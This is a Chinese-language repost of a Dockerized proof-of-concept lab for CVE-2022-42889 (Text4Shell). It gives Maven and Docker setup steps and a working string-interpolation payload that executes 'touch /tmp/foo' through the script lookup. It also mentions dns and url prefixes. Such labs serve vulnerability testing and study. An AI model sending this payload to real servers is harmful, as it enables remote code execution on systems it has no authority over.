CVE-2022-42889 Text4Shell的Docker化POC
作者:Sec-Labs | 发布时间:
项目地址
https://github.com/karthikuj/cve-2022-42889-text4shell-docker
安装 maven - maven-linux
- Maven 安装以创建 fat jar
mvn clean install
- Docker 构建
docker build --tag=text4shell .
- Docker运行
docker run -p 80:8080 text4shell
- 测试应用程序
http://localhost/text4shell/attack?search=<anything>
- 可以通过传递字符串“${prefix:name}”来执行攻击,其中前缀是上述查找:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
- 您也可以尝试使用
dnsorurl前缀。 - 获取容器id
docker container ls
- 进入应用程序
docker exec -it <container_id> bash
foo检查上述 RCE 是否成功(您应该会看到在目录中创建了一个名为的/tmp文件):
ls /tmp/
- 停止容器
docker container stop <container_id>
标签:工具分享, 漏洞分享, POC脚本